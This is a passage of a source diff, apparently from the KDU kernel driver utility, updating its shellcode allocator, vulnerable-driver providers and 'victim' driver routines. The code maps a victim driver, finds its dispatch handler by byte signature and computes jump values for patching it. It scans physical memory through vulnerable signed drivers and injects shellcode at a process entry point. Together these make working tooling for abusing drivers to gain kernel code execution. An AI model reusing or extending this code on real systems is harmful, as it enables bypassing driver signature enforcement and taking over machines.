+ _In_ ULONG ScVersion,
_Out_opt_ PULONG PayloadSize
)
{
ULONG payloadSize;
- switch (ShellVersion) {
- case KDU_SHELLCODE_V3:
- payloadSize = sizeof(PAYLOAD_HEADER_V3);
- break;
- case KDU_SHELLCODE_V2:
- payloadSize = sizeof(PAYLOAD_HEADER_V2);
- break;
- case KDU_SHELLCODE_V4:
- case KDU_SHELLCODE_V1:
- default:
- payloadSize = sizeof(PAYLOAD_HEADER_V1);
- break;
- }
-
- if (PayloadSize)
+ if (PayloadSize) {
+ switch (ScVersion) {
+ case KDU_SHELLCODE_V3:
+ payloadSize = sizeof(PAYLOAD_HEADER_V3);
+ break;
+ case KDU_SHELLCODE_V2:
+ payloadSize = sizeof(PAYLOAD_HEADER_V2);
+ break;
+ case KDU_SHELLCODE_V4:
+ case KDU_SHELLCODE_V1:
+ default:
+ payloadSize = sizeof(PAYLOAD_HEADER_V1);
+ break;
+ }
*PayloadSize = payloadSize;
+ }
return sizeof(SHELLCODE);
}
@@ -1495,13 +1495,13 @@ DWORD ScSizeOf(
*
*/
BOOL ScBuildShellImportDebug(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer
)
{
- SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr;
+ SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer;
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
case KDU_SHELLCODE_V3:
@@ -1535,8 +1535,8 @@ BOOL ScBuildShellImportDebug(
*
*/
BOOL ScBuildShellImport(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr,
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer,
_In_ ULONG_PTR KernelBase,
_In_ ULONG_PTR KernelImage
)
@@ -1545,7 +1545,7 @@ BOOL ScBuildShellImport(
ULONG i;
- SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr;
+ SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer;
#ifdef ENABLE_DBGPRINT
pfnDbgPrint DbgPrintPtr;
@@ -1564,7 +1564,7 @@ BOOL ScBuildShellImport(
"KeSetEvent"
};
- UNREFERENCED_PARAMETER(ShellVersion);
+ UNREFERENCED_PARAMETER(ScVersion);
do {
@@ -1619,16 +1619,16 @@ BOOL ScBuildShellImport(
*
*/
HANDLE ScCreateReadyEvent(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer
)
{
HANDLE hReadyEvent;
- SHELLCODE* ShellCode = (SHELLCODE*)ShellPtr;
+ SHELLCODE* ShellCode = (SHELLCODE*)ScBuffer;
hReadyEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
case KDU_SHELLCODE_V3:
case KDU_SHELLCODE_V2:
@@ -1748,10 +1748,12 @@ BOOLEAN ScStoreVersionSpecificData(
*
*/
VOID ScFree(
- _In_ PVOID ShellPtr
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize
)
{
- VirtualFree(ShellPtr, 0, MEM_RELEASE);
+ VirtualUnlock(ScBuffer, ScSize);
+ VirtualFree(ScBuffer, 0, MEM_RELEASE);
}
/*
@@ -1806,7 +1808,7 @@ PVOID ScAllocate(
_Out_ PULONG ShellSize
)
{
- SIZE_T scSize;
+ DWORD scSize;
PSHELLCODE pvShellCode = NULL;
PVOID pvBootstrap;
@@ -1855,6 +1857,11 @@ PVOID ScAllocate(
if (pvShellCode == NULL)
return NULL;
+ if (!VirtualLock(pvShellCode, scSize)) {
+ VirtualFree(pvShellCode, 0, MEM_RELEASE);
+ return NULL;
+ }
+
pvBootstrap = pvShellCode->BootstrapCode;
switch (ShellVersion) {
@@ -1873,7 +1880,7 @@ PVOID ScAllocate(
// Build initial loader code part.
//
if (!ScBuildInitCodeForVersion(ShellVersion, pvShellCode)) {
- VirtualFree(pvShellCode, 0, MEM_RELEASE);
+ ScFree(pvShellCode, scSize);
return NULL;
}
@@ -1914,7 +1921,7 @@ PVOID ScAllocate(
KernelBase,
KernelImage))
{
- VirtualFree(pvShellCode, 0, MEM_RELEASE);
+ ScFree(pvShellCode, scSize);
supPrintfEvent(kduEventError,
"[!] Failed to resolve base shellcode import\r\n");
diff --git a/Source/Hamakaze/shellcode.h b/Source/Hamakaze/shellcode.h
index 9b81b9b..4717d02 100644
--- a/Source/Hamakaze/shellcode.h
+++ b/Source/Hamakaze/shellcode.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SHELLCODE.H
*
-* VERSION: 1.20
+* VERSION: 1.30
*
-* DATE: 15 Feb 2022
+* DATE: 20 Mar 2023
*
* Default driver mapping shellcode(s) prototypes and definitions.
*
@@ -64,11 +64,11 @@ typedef struct _PAYLOAD_HEADER_V3 {
} PAYLOAD_HEADER_V3, * PPAYLOAD_HEADER_V3;
SIZE_T ScGetViewSize(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellCodePtr);
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer);
DWORD ScSizeOf(
- _In_ ULONG ShellVersion,
+ _In_ ULONG ScVersion,
_Out_opt_ PULONG PayloadSize);
ULONG ScSizeOfProc(
@@ -79,8 +79,8 @@ BOOLEAN ScCreateFixedUnicodeString(
_In_ PCWSTR SourceString);
HANDLE ScCreateReadyEvent(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr);
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer);
BOOLEAN ScStoreVersionSpecificData(
_In_ PKDU_CONTEXT Context,
@@ -102,7 +102,8 @@ PVOID ScGetBootstrapLdr(
_Out_opt_ PULONG Size);
VOID ScFree(
- _In_ PVOID ShellPtr);
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize);
PVOID ScAllocate(
_In_ ULONG ShellVersion,
diff --git a/Source/Hamakaze/sig.h b/Source/Hamakaze/sig.h
index cf80a4c..0ff541e 100644
--- a/Source/Hamakaze/sig.h
+++ b/Source/Hamakaze/sig.h
@@ -1,14 +1,14 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SIG.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
-* Signatures header file.
+* Signatures definition header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -21,7 +21,8 @@
//
// Process Explorer dispatch signature.
//
-static unsigned char ProcExpSignature[] = {
+
+static unsigned char g_ProcExpSig[] = {
0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x81, 0xEC, 0x90, 0x00,
0x00, 0x00, 0x48, 0x8B, 0xFA, 0x33, 0xDB, 0x48, 0x8B, 0xD1, 0x48,
0x8B, 0x8F, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x47, 0x18, 0x48,
diff --git a/Source/Hamakaze/sup.cpp b/Source/Hamakaze/sup.cpp
index be8f946..7fe4fd2 100644
--- a/Source/Hamakaze/sup.cpp
+++ b/Source/Hamakaze/sup.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SUP.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 07 Dec 2022
+* DATE: 20 Mar 2023
*
* Program global support routines.
*
@@ -597,6 +597,27 @@ BOOL supRegDeleteKeyRecursive(
return supxDeleteKeyRecursive(hKeyRoot, szKeyName);
}
+/*
+* supRegWriteValueDWORD
+*
+* Purpose:
+*
+* Write DWORD value to the registry.
+*
+*/
+NTSTATUS supRegWriteValueDWORD(
+ _In_ HANDLE RegistryHandle,
+ _In_ LPCWSTR ValueName,
+ _In_ DWORD ValueData
+)
+{
+ UNICODE_STRING valueName;
+
+ RtlInitUnicodeString(&valueName, ValueName);
+ return NtSetValueKey(RegistryHandle, &valueName, 0, REG_DWORD,
+ (PVOID)&ValueData, sizeof(DWORD));
+}
+
/*
* supRegWriteValueString
*
@@ -913,7 +934,7 @@ NTSTATUS supOpenDriverEx(
0,
0,
FILE_OPEN,
- 0,
+ FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
@@ -2320,7 +2341,7 @@ PVOID supGetEntryPointForMappedFile(
*/
NTSTATUS supInjectPayload(
_In_ PVOID pvTargetImage,
- _In_ PVOID pvShellCode,
+ _In_ PVOID pbShellCode,
_In_ ULONG cbShellCode,
_In_ LPWSTR lpTargetModule,
_Out_ PHANDLE phZombieProcess
@@ -2467,7 +2488,7 @@ NTSTATUS supInjectPayload(
}
RtlCopyMemory(RtlOffsetToPointer(pvLocalBase, optHeader->AddressOfEntryPoint),
- pvShellCode,
+ pbShellCode,
cbShellCode);
ResumeThread(processInfo.hThread);
diff --git a/Source/Hamakaze/sup.h b/Source/Hamakaze/sup.h
index 635a2ce..af98776 100644
--- a/Source/Hamakaze/sup.h
+++ b/Source/Hamakaze/sup.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SUP.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 21 Nov 2022
+* DATE: 20 Mar 2023
*
* Support routines header file.
*
@@ -235,6 +235,11 @@ BOOL supManageDummyDll(
ULONG supSelectNonPagedPoolTag(
VOID);
+NTSTATUS supRegWriteValueDWORD(
+ _In_ HANDLE RegistryHandle,
+ _In_ LPCWSTR ValueName,
+ _In_ DWORD ValueData);
+
NTSTATUS supRegWriteValueString(
_In_ HANDLE RegistryHandle,
_In_ LPCWSTR ValueName,
@@ -293,7 +298,7 @@ PVOID supGetEntryPointForMappedFile(
NTSTATUS supInjectPayload(
_In_ PVOID pvTargetImage,
- _In_ PVOID pvShellCode,
+ _In_ PVOID pbShellCode,
_In_ ULONG cbShellCode,
_In_ LPWSTR lpTargetModule,
_Out_ PHANDLE phZombieProcess);
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index fa64147..797a1ab 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: TESTS.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* KDU tests.
*
@@ -89,20 +89,19 @@ BOOL WINAPI TestPhysMemEnumCallback(
{
PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext;
- PKDU_CONTEXT Context = Params->Context;
- ULONG signatureSize = sizeof(ProcExpSignature);
+ ULONG signatureSize = Params->DispatchSignatureLength;
BYTE buffer[PAGE_SIZE];
RtlSecureZeroMemory(&buffer, sizeof(buffer));
- if (Context->Provider->Callbacks.ReadPhysicalMemory(Context->DeviceHandle,
+ if (Params->ReadPhysicalMemory(Params->DeviceHandle,
Address,
&buffer,
PAGE_SIZE))
{
- if (signatureSize == RtlCompareMemory(ProcExpSignature,
- RtlOffsetToPointer(buffer, PE152_DISPATCH_PAGE_OFFSET),
+ if (signatureSize == RtlCompareMemory(Params->DispatchSignature,
+ RtlOffsetToPointer(buffer, Params->DispatchHandlerPageOffset),
signatureSize))
{
printf_s("\t Found code at address 0x%llX\r\n", Address);
@@ -116,20 +115,37 @@ BOOL WINAPI TestPhysMemEnumCallback(
VOID TestBrute(PKDU_CONTEXT Context)
{
KDU_PHYSMEM_ENUM_PARAMS params;
+ VICTIM_IMAGE_INFORMATION vi;
+ HANDLE victimDeviceHandle = NULL;
- params.bWrite = FALSE;
- params.cbPayload = 0;
- params.pvPayload = NULL;
- params.Context = Context;
- params.ccPagesFound = 0;
- params.ccPagesModified = 0;
+ if (VpCreate(Context->Victim, Context->ModuleBase, &victimDeviceHandle, NULL, NULL)) {
- if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, ¶ms)) {
+ RtlSecureZeroMemory(&vi, sizeof(vi));
+ VpQueryInformation(Context->Victim, VictimImageInformation, &vi, sizeof(vi));
- printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound);
+ params.DeviceHandle = Context->DeviceHandle;
+ params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
+ params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
+ params.DispatchSignature = Context->Victim->Data.DispatchSignature;
+ params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;
+
+ params.DispatchHandlerOffset = vi.DispatchOffset;
+ params.DispatchHandlerPageOffset = vi.DispatchPageOffset;
+ params.JmpAddress = vi.JumpValue;
+
+ params.bWrite = FALSE;
+ params.cbPayload = 0;
+ params.pvPayload = NULL;
+ params.ccPagesFound = 0;
+ params.ccPagesModified = 0;
+
+ if (supEnumeratePhysicalMemory(TestPhysMemEnumCallback, ¶ms)) {
+
+ printf_s("[+] Number of pages found: %llu\r\n", params.ccPagesFound);
+
+ }
}
-
}
VOID KDUTest()
@@ -141,7 +157,7 @@ VOID KDUTest()
RtlSecureZeroMemory(&Buffer, sizeof(Buffer));
- Context = KDUProviderCreate(KDU_PROVIDER_AMD_RYZENMASTER,
+ Context = KDUProviderCreate(KDU_PROVIDER_WINRING0,
FALSE,
NT_WIN7_SP1,
KDU_SHELLCODE_V1,
diff --git a/Source/Hamakaze/victim.cpp b/Source/Hamakaze/victim.cpp
index fb0dc7b..e6db1b9 100644
--- a/Source/Hamakaze/victim.cpp
+++ b/Source/Hamakaze/victim.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2022
+* (C) COPYRIGHT AUTHORS, 2018 - 2023
*
* TITLE: VICTIM.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Victim support routines.
*
@@ -30,10 +30,12 @@
BOOL VpCreate(
_Inout_ PKDU_VICTIM_PROVIDER Context,
_In_opt_ HINSTANCE ModuleBase,
- _Out_opt_ PHANDLE VictimHandle
+ _Out_opt_ PHANDLE VictimHandle,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam
)
{
- supPrintfEvent(kduEventInformation,
+ supPrintfEvent(kduEventInformation,
"[+] Processing victim \"%ws\" driver\r\n",
Context->Desc);
@@ -42,7 +44,10 @@ BOOL VpCreate(
Context->Name,
Context->ResourceId,
Context->DesiredAccess,
- VictimHandle);
+ VictimHandle,
+ &Context->Data.VictimImage,
+ Callback,
+ CallbackParam);
}
/*
@@ -67,7 +72,10 @@ BOOL VpRelease(
*VictimHandle = NULL;
}
}
-
+
+ if (Context->Data.VictimImage)
+ VirtualFree(Context->Data.VictimImage, 0, MEM_RELEASE);
+
return Context->Callbacks.Release(Context->Name);
}
@@ -84,8 +92,8 @@ VOID VpExecutePayload(
_Out_opt_ PHANDLE VictimHandle
)
{
- Context->Callbacks.Execute(Context->Name,
- Context->DesiredAccess,
+ Context->Callbacks.Execute(Context->Name,
+ Context->DesiredAccess,
VictimHandle);
}
@@ -98,12 +106,14 @@ VOID VpExecutePayload(
* This routine will try to force unload driver on loading if Force parameter set to TRUE.
*
*/
-BOOL VppLoadUnloadDriver(
+NTSTATUS VppLoadUnloadDriver(
_In_ LPCWSTR Name,
_In_ LPCWSTR ImagePath,
_In_ BOOLEAN Force,
_In_ BOOLEAN Unload,
- _Out_opt_ NTSTATUS* ErrorStatus)
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam
+ )
{
NTSTATUS ntStatus;
@@ -111,13 +121,10 @@ BOOL VppLoadUnloadDriver(
ntStatus = supUnloadDriver(Name, TRUE);
}
else {
- ntStatus = supLoadDriver(Name, ImagePath, Force);
+ ntStatus = supLoadDriverEx(Name, ImagePath, Force, Callback, CallbackParam);
}
- if (ErrorStatus)
- *ErrorStatus = ntStatus;
-
- return (NT_SUCCESS(ntStatus));
+ return ntStatus;
}
/*
@@ -165,8 +172,14 @@ BOOL VpCreateCallback(
_In_ LPCWSTR Name, //same as device name
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle)
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID* VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam
+)
{
+ BOOL bResult = FALSE;
+ NTSTATUS ntStatus;
PBYTE drvBuffer = NULL;
ULONG resourceSize = 0;
LPWSTR driverFileName = NULL;
@@ -174,37 +187,45 @@ BOOL VpCreateCallback(
if (VictimHandle)
*VictimHandle = NULL;
+ if (VictimImage)
+ *VictimImage = NULL;
driverFileName = VppBuildDriverName(Name);
if (driverFileName) {
do {
-
+
if (supIsObjectExists((LPWSTR)L"\\Device", Name)) {
-
- supPrintfEvent(kduEventError,
+
+ supPrintfEvent(kduEventError,
"[!] Victim driver already loaded, force reload\r\n");
- supPrintfEvent(kduEventError,
+ supPrintfEvent(kduEventError,
"[!] Attempt to unload %ws\r\n", Name);
- NTSTATUS ntStatus;
- if (!VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, &ntStatus)) {
-
- supPrintfEvent(kduEventError,
- "[!] Could not force unload victim, NTSTATUS(0x%lX) abort\r\n",
+ ntStatus = VppLoadUnloadDriver(Name,
+ driverFileName,
+ FALSE,
+ TRUE,
+ NULL,
+ NULL);
+
+ if (!NT_SUCCESS(ntStatus))
+ {
+ supPrintfEvent(kduEventError,
+ "[!] Could not force unload victim, NTSTATUS(0x%lX) abort\r\n",
ntStatus);
-
+
break;
}
else {
- supPrintfEvent(kduEventInformation,
+ supPrintfEvent(kduEventInformation,
"[+] Previous instance of victim driver unloaded\r\n");
}
}
- drvBuffer = (PBYTE)KDULoadResource(ResourceId,
- ModuleBase,
+ drvBuffer = (PBYTE)KDULoadResource(ResourceId,
+ ModuleBase,
&resourceSize,
PROVIDER_RES_KEY,
TRUE);
@@ -214,7 +235,25 @@ BOOL VpCreateCallback(
break;
}
- NTSTATUS ntStatus;
+ if (VictimImage) {
+
+ DWORD vSize = 0;
+ PVOID vpImage = PELoaderLoadImage(drvBuffer, &vSize);
+
+ if (vpImage == NULL) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Could not map victim image, abort\r\n");
+
+ SetLastError(ERROR_INTERNAL_ERROR);
+ break;
+ }
+
+ printf_s("[+] Mapped victim image at %p with size 0x%lX bytes\r\n", vpImage, vSize);
+
+ *VictimImage = vpImage;
+ }
+
ULONG writeBytes;
printf_s("[+] Extracting victim driver \"%ws\" as \"%ws\"\r\n", Name, driverFileName);
@@ -234,28 +273,34 @@ BOOL VpCreateCallback(
// Driver is in use.
//
if (ntStatus == STATUS_SHARING_VIOLATION) {
- supPrintfEvent(kduEventError,
+ supPrintfEvent(kduEventError,
"[!] Sharing violation, driver maybe in use, please close all application(s) that are using this driver\r\n");
}
else {
supPrintfEvent(kduEventError,
"[!] Could not extract victim driver, NTSTATUS(0x%lX) abort\r\n",
- ntStatus);
-
+ ntStatus);
+
}
SetLastError(RtlNtStatusToDosError(ntStatus));
break;
}
- ntStatus = STATUS_UNSUCCESSFUL;
- if (VppLoadUnloadDriver(Name, driverFileName, TRUE, FALSE, &ntStatus)) {
+ ntStatus = VppLoadUnloadDriver(Name,
+ driverFileName,
+ TRUE,
+ FALSE,
+ Callback,
+ CallbackParam);
- SetLastError(RtlNtStatusToDosError(ntStatus));
+ if (NT_SUCCESS(ntStatus)) {
+
+ SetLastError(ERROR_SUCCESS);
if (VictimHandle) {
-
+
ntStatus = supOpenDriver(Name, DesiredAccess, &deviceHandle);
if (NT_SUCCESS(ntStatus)) {
*VictimHandle = deviceHandle;
@@ -265,6 +310,8 @@ BOOL VpCreateCallback(
}
}
+ bResult = TRUE;
+
}
else {
SetLastError(RtlNtStatusToDosError(ntStatus));
@@ -275,7 +322,7 @@ BOOL VpCreateCallback(
supHeapFree(driverFileName);
}
- return (deviceHandle != NULL);
+ return bResult;
}
/*
@@ -294,7 +341,7 @@ BOOL VpReleaseCallback(
LPWSTR driverFileName = VppBuildDriverName(Name);
if (driverFileName) {
- bResult = VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, NULL);
+ bResult = NT_SUCCESS(VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, NULL, NULL));
DeleteFile(driverFileName);
supHeapFree(driverFileName);
}
@@ -319,6 +366,32 @@ VOID VpExecuteCallback(
supOpenDriver(Name, DesiredAccess, VictimHandle);
}
+/*
+* VpExecuteCallbackEx
+*
+* Purpose:
+*
+* Execute victim payload by IOCTL call.
+*
+*/
+VOID VpExecuteCallbackEx(
+ _In_ LPCWSTR Name,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE VictimHandle
+)
+{
+ HANDLE victimHandle = NULL;
+ ULONG dummy = 0;
+
+ if (NT_SUCCESS(supOpenDriver(Name, DesiredAccess, &victimHandle))) {
+
+ supCallDriver(victimHandle, 0xBADDAB, &dummy, sizeof(dummy), &dummy, sizeof(dummy));
+
+ }
+
+ *VictimHandle = victimHandle;
+}
+
/*
* VppOpenExistingDriverDevice
*
@@ -395,10 +468,51 @@ BOOL VpCreateFromExistingCallback(
_In_ LPCWSTR Name,
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle)
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID* VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam)
{
UNREFERENCED_PARAMETER(ModuleBase);
UNREFERENCED_PARAMETER(ResourceId);
+ UNREFERENCED_PARAMETER(Callback);
+ UNREFERENCED_PARAMETER(CallbackParam);
+
+ if (VictimHandle) *VictimHandle = NULL;
+
+ if (VictimImage) {
+
+ *VictimImage = NULL;
+
+ DWORD resourceSize = 0;
+ PBYTE drvBuffer = (PBYTE)KDULoadResource(ResourceId,
+ ModuleBase,
+ &resourceSize,
+ PROVIDER_RES_KEY,
+ TRUE);
+
+ if (drvBuffer == NULL) {
+ SetLastError(ERROR_FILE_NOT_FOUND);
+ return FALSE;
+ }
+
+ DWORD vSize = 0;
+ PVOID vpImage = PELoaderLoadImage(drvBuffer, &vSize);
+
+ if (vpImage == NULL) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Could not map victim image, abort\r\n");
+
+ SetLastError(ERROR_INTERNAL_ERROR);
+ return FALSE;
+ }
+
+ printf_s("[+] Mapped victim image at %p with size 0x%lX bytes\r\n", vpImage, vSize);
+
+ *VictimImage = vpImage;
+
+ }
return VppOpenExistingDriverDevice(Name, DesiredAccess, VictimHandle);
}
@@ -419,3 +533,179 @@ BOOL VpReleaseCallbackStub(
return TRUE;
}
+
+/*
+* VpLoadDriverCallback
+*
+* Purpose:
+*
+* supLoadDriverEx callback to store specific data in registry entry.
+*
+*/
+NTSTATUS CALLBACK VpLoadDriverCallback(
+ _In_ PUNICODE_STRING RegistryPath,
+ _In_opt_ PVOID Param
+)
+{
+ NTSTATUS ntStatus = STATUS_SUCCESS;
+ VICTIM_LOAD_PARAMETERS* params;
+
+ UNREFERENCED_PARAMETER(RegistryPath);
+
+ if (Param == NULL)
+ return STATUS_INVALID_PARAMETER_2;
+
+ params = (VICTIM_LOAD_PARAMETERS*)Param;
+
+ switch (params->Provider->VictimId) {
+ case KDU_VICTIM_PE1627:
+ case KDU_VICTIM_PE1702:
+ default:
+ break;
+ }
+
+ return ntStatus;
+}
+
+/*
+* VpQueryInformation
+*
+* Purpose:
+*
+* Query various victim information.
+*
+*/
+_Success_(return != FALSE)
+BOOL VpQueryInformation(
+ _In_ PKDU_VICTIM_PROVIDER Context,
+ _In_ VICTIM_INFORMATION VictimInformationClass,
+ _Inout_ PVOID Information,
+ _In_ ULONG InformationLength)
+{
+ BOOL bResult = TRUE;
+ PVICTIM_IMAGE_INFORMATION imageInfo;
+ PVICTIM_DRIVER_INFORMATION driverInfo;
+
+ PVOID dispatchSignature = 0;
+ ULONG signatureSize = 0;
+
+ PVOID sectionBase;
+ ULONG sectionSize;
+
+ switch (VictimInformationClass) {
+
+ case VictimImageInformation:
+
+ if (InformationLength == sizeof(VICTIM_IMAGE_INFORMATION)) {
+
+ imageInfo = (VICTIM_IMAGE_INFORMATION*)Information;
+
+ dispatchSignature = Context->Data.DispatchSignature;
+ signatureSize = Context->Data.DispatchSignatureLength;
+
+ sectionBase = ntsupLookupImageSectionByName((CHAR*)TEXT_SECTION,
+ TEXT_SECTION_LEGNTH,
+ (PVOID)Context->Data.VictimImage,
+ §ionSize);
+
+ if (sectionBase && sectionSize) {
+
+ PBYTE ptrCode = NULL;
+
+ ptrCode = (PBYTE)ntsupFindPattern((PBYTE)sectionBase,
+ sectionSize,
+ (PBYTE)dispatchSignature,
+ signatureSize);
+
+ if (ptrCode) {
+ imageInfo->DispatchOffset = (ULONG_PTR)ptrCode & 0xffff;
+ imageInfo->DispatchPageOffset = imageInfo->DispatchOffset & 0xfff;
+
+ LONG_PTR rel = (LONG_PTR)sectionBase - (LONG_PTR)ptrCode - 5;
+
+ imageInfo->JumpValue = (ULONG)rel;
+ }
+ else {
+ SetLastError(ERROR_NOT_FOUND);
+ bResult = FALSE;
+ }
+
+ }
+ else {
+ SetLastError(ERROR_SECTION_NOT_FOUND);
+ bResult = FALSE;
+ }
+
+ }
+ else {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ bResult = FALSE;
+ }
+
+ break;
+
+ case VictimDriverInformation:
+
+ if (InformationLength == sizeof(VICTIM_DRIVER_INFORMATION)) {
+
+ driverInfo = (VICTIM_DRIVER_INFORMATION*)Information;
+
+ PRTL_PROCESS_MODULE_INFORMATION target;
+ PRTL_PROCESS_MODULES modulesList = (PRTL_PROCESS_MODULES)supGetLoadedModulesList(FALSE, NULL);
+ if (modulesList) {
+
+ ANSI_STRING driverNameAs;
+ UNICODE_STRING driverNameUs;
+
+ WCHAR szTargetDriver[MAX_PATH];
+
+ StringCchPrintf(szTargetDriver, MAX_PATH, L"%ws.sys", Context->Name);
+ RtlInitUnicodeString(&driverNameUs, szTargetDriver);
+
+ driverNameAs.Buffer = NULL;
+ driverNameAs.Length = driverNameAs.MaximumLength = 0;
+
+ NTSTATUS ntStatus;
+
+ ntStatus = RtlUnicodeStringToAnsiString(&driverNameAs, &driverNameUs, TRUE);
+ if (NT_SUCCESS(ntStatus) && driverNameAs.Buffer) {
+
+ target = (PRTL_PROCESS_MODULE_INFORMATION)ntsupFindModuleEntryByName(modulesList, driverNameAs.Buffer);
+ if (target) {
+ driverInfo->LoadedImageBase = (ULONG_PTR)target->ImageBase;
+ driverInfo->ImageSize = target->ImageSize;
+ }
+
+ RtlFreeAnsiString(&driverNameAs);
+ }
+ else {
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ bResult = FALSE;
+ }
+ supHeapFree(modulesList);
+ }
+ else {
+ SetLastError(ERROR_INTERNAL_ERROR);
+ bResult = FALSE;
+ }
+ }
+ else {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ bResult = FALSE;
+ }
+
+ break;
+
+ case VictimRopChainInformation:
+ UNREFERENCED_PARAMETER(Information);
+ bResult = FALSE;
+ break;
+
+ default:
+ UNREFERENCED_PARAMETER(Information);
+ bResult = FALSE;
+ break;
+ }
+
+ return bResult;
+}
diff --git a/Source/Hamakaze/victim.h b/Source/Hamakaze/victim.h
index 3fb2f0c..f6acae0 100644
--- a/Source/Hamakaze/victim.h
+++ b/Source/Hamakaze/victim.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2022
+* (C) COPYRIGHT AUTHORS, 2018 - 2023
*
* TITLE: VICTIM.H
*
-* VERSION: 1.20
+* VERSION: 1.30
*
-* DATE: 08 Feb 2022
+* DATE: 20 Mar 2023
*
* Victim support prototypes and definitions.
*
@@ -24,7 +24,10 @@ typedef BOOL(WINAPI* pfnVictimCreate)(
_In_ LPCWSTR Name,
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID *VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam
);
typedef BOOL(WINAPI* pfnVictimRelease)(
@@ -37,6 +40,28 @@ typedef VOID(WINAPI* pfnVictimExecute)(
_Out_opt_ PHANDLE VictimHandle
);
+typedef enum _VICTIM_INFORMATION {
+ VictimImageInformation = 0,
+ VictimDriverInformation,
+ VictimRopChainInformation,
+ MaxVictimInformation
+} VICTIM_INFORMATION;
+
+typedef struct _VICTIM_IMAGE_INFORMATION {
+ ULONG DispatchOffset;
+ ULONG DispatchPageOffset;
+ ULONG JumpValue;
+} VICTIM_IMAGE_INFORMATION, * PVICTIM_IMAGE_INFORMATION;
+
